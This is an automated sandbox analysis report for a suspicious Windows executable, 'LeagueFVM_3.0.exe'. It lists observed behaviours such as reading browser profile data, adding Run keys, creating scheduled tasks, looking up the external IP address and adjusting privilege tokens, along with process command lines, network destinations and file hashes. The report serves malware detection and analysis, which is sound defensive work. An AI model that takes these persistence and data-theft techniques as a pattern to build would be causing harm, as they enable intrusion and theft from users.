Analysis Overview
SHA256
8c2eb862448e93318be6a3bcac2750d6cacfde9ea4dafeef0cdbe1b81fbd4a9e
Threat Level: Shows suspicious behavior
The file LeagueFVM_3.0.exe was found to be: Shows suspicious behavior.
Malicious Activity Summary
Loads dropped DLL
Executes dropped EXE
Reads user/profile data of web browsers
Drops startup file
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Drops file in System32 directory
Program crash
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
Unsigned PE
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Views/modifies file attributes
Suspicious behavior: AddClipboardFormatListener
Enumerates system info in registry
Uses Task Scheduler COM API
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Detects videocard installed
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Runs net.exe
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-12 14:35
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral9
Detonation Overview
Submitted
2024-06-12 14:34
Reported
2024-06-12 14:38
Platform
win11-20240508-en
Max time kernel
108s
Max time network
128s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 52.111.227.14:443 | tcp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-06-12 14:34
Reported
2024-06-12 14:38
Platform
win11-20240611-en
Max time kernel
85s
Max time network
125s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe
"C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| SE | 192.229.221.95:80 | tcp | |
| US | 20.189.173.15:443 | tcp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-06-12 14:34
Reported
2024-06-12 14:38
Platform
win11-20240611-en
Max time kernel
85s
Max time network
93s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vk_swiftshader.dll,#1
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-12 14:34
Reported
2024-06-12 14:38
Platform
win11-20240419-en
Max time kernel
130s
Max time network
142s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1472 wrote to memory of 2660 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1472 wrote to memory of 2660 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1472 wrote to memory of 2660 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2660 -ip 2660
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 536
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-12 14:34
Reported
2024-06-12 14:38
Platform
win11-20240611-en
Max time kernel
90s
Max time network
94s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3704 wrote to memory of 1044 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3704 wrote to memory of 1044 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3704 wrote to memory of 1044 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1044 -ip 1044
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 460
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-12 14:34
Reported
2024-06-12 14:38
Platform
win11-20240611-en
Max time kernel
145s
Max time network
154s
Command Line
Signatures
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\LICENSES.chromium.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8abc53cb8,0x7ff8abc53cc8,0x7ff8abc53cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,13134901197426537834,10425992860253302259,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1928 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1844,13134901197426537834,10425992860253302259,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1844,13134901197426537834,10425992860253302259,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,13134901197426537834,10425992860253302259,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,13134901197426537834,10425992860253302259,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1844,13134901197426537834,10425992860253302259,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5300 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,13134901197426537834,10425992860253302259,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,13134901197426537834,10425992860253302259,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,13134901197426537834,10425992860253302259,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4052 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,13134901197426537834,10425992860253302259,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1844,13134901197426537834,10425992860253302259,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,13134901197426537834,10425992860253302259,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1908 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 196eaa9f7a574c29bd419f9d8c2d9349 |
| SHA1 | 19982d15d1e2688903b0a3e53a8517ab537b68ed |
| SHA256 | df1e96677bcfffe5044826aa14a11e85ef2ebb014ee9e890e723a14dc5f31412 |
| SHA512 | e066d74da36a459c19db30e68b703ec9f92019f2d5f24fd476a5fd3653c0b453871e2c08cdc47f2b4d4c4be19ff99e6ef3956d93b2d7d0a69645577d44125ac7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f717f56b5d8e2e057c440a5a81043662 |
| SHA1 | 0ad6c9bbd28dab5c9664bad04db95fd50db36b3f |
| SHA256 | 4286cd3f23251d0a607e47eccb5e0f4af8542d38b32879d2db2ab7f4e6031945 |
| SHA512 | 61e263935d51028ec0aab51b938b880945a950cec9635a0dafddf795658ea0a2dfcf9cfc0cab5459b659bb7204347b047a5c6b924fabea44ce389b1cbb9867d6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 54032d7271ee174a0352a018e05e89f1 |
| SHA1 | 9d80695f2cc320944b12e38921aea9d5430c5c10 |
| SHA256 | abf3f40069fcc8b8140fcf013c69841cf9e64cdfba51a2f1ab3183744695dc82 |
| SHA512 | 1139a2b4c134095a0956b4a540294bac19cf4ce4df7101590671eade823976a4a04b684ba95cb85fe9c4b3ce2f1805569f2f0e3042cc007d45ced041f104ece5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 20427be5a388aab3254d8bc244391ac8 |
| SHA1 | d212b7617b01767d529beec61b368cb8ace4f4a1 |
| SHA256 | 43b73cd3301c3591cf502ae3b71ea07827f097f8587fc56f553de13224709c36 |
| SHA512 | d2d236a9411df1dec45e1f69579533eb493269138566d76f82bc1e8cd2c1bc755e6677d3d2b430f6576a437cd11783e9138d57c4309774cb8f9366815e56ff25 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 44f989ff282cbaeef2047a0804eacb83 |
| SHA1 | 4c1c84eaec7f8f3a4a8a0eaed4b484093c9b5cc1 |
| SHA256 | 92915278bee8235ee4e1dc117d29b95a27fa75180d4a38642bda148f8bfe7d18 |
| SHA512 | 68495c04c5db89a42fd594ceabeed148f66667a9d7c2a4c466a562662c40e99d0deed886060b78b4d87dd6d2162c3bd115515dee39e7b77277f5ab35e9957926 |
Analysis: behavioral8
Detonation Overview
Submitted
2024-06-12 14:34
Reported
2024-06-12 14:38
Platform
win11-20240508-en
Max time kernel
113s
Max time network
131s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 52.111.227.11:443 | tcp |
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-06-12 14:34
Reported
2024-06-12 14:38
Platform
win11-20240508-en
Max time kernel
130s
Max time network
142s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4672 wrote to memory of 1976 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4672 wrote to memory of 1976 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4672 wrote to memory of 1976 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1976 -ip 1976
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1976 -s 468
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-06-12 14:34
Reported
2024-06-12 14:38
Platform
win11-20240508-en
Max time kernel
139s
Max time network
162s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\d3dcompiler_47.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-06-12 14:34
Reported
2024-06-12 14:38
Platform
win11-20240508-en
Max time kernel
125s
Max time network
140s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vulkan-1.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-12 14:34
Reported
2024-06-12 14:38
Platform
win11-20240508-en
Max time kernel
150s
Max time network
153s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hjkLgGzTfkBWy5vURRbasdDowq\LeagueFVM_2.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hjkLgGzTfkBWy5vURRbasdDowq\LeagueFVM_2.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hjkLgGzTfkBWy5vURRbasdDowq\LeagueFVM_2.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hjkLgGzTfkBWy5vURRbasdDowq\LeagueFVM_2.3.exe | N/A |
Loads dropped DLL
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_01cf530faf2f1752\display.PNF | C:\Users\Admin\AppData\Local\Temp\2hjkLgGzTfkBWy5vURRbasdDowq\LeagueFVM_2.3.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_01cf530faf2f1752\display.PNF | C:\Users\Admin\AppData\Local\Temp\2hjkLgGzTfkBWy5vURRbasdDowq\LeagueFVM_2.3.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 | C:\Users\Admin\AppData\Local\Temp\2hjkLgGzTfkBWy5vURRbasdDowq\LeagueFVM_2.3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\AppData\Local\Temp\2hjkLgGzTfkBWy5vURRbasdDowq\LeagueFVM_2.3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\2hjkLgGzTfkBWy5vURRbasdDowq\LeagueFVM_2.3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | C:\Users\Admin\AppData\Local\Temp\2hjkLgGzTfkBWy5vURRbasdDowq\LeagueFVM_2.3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\2hjkLgGzTfkBWy5vURRbasdDowq\LeagueFVM_2.3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\2hjkLgGzTfkBWy5vURRbasdDowq\LeagueFVM_2.3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\AppData\Local\Temp\2hjkLgGzTfkBWy5vURRbasdDowq\LeagueFVM_2.3.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Runs net.exe
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\LeagueFVM_3.0.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
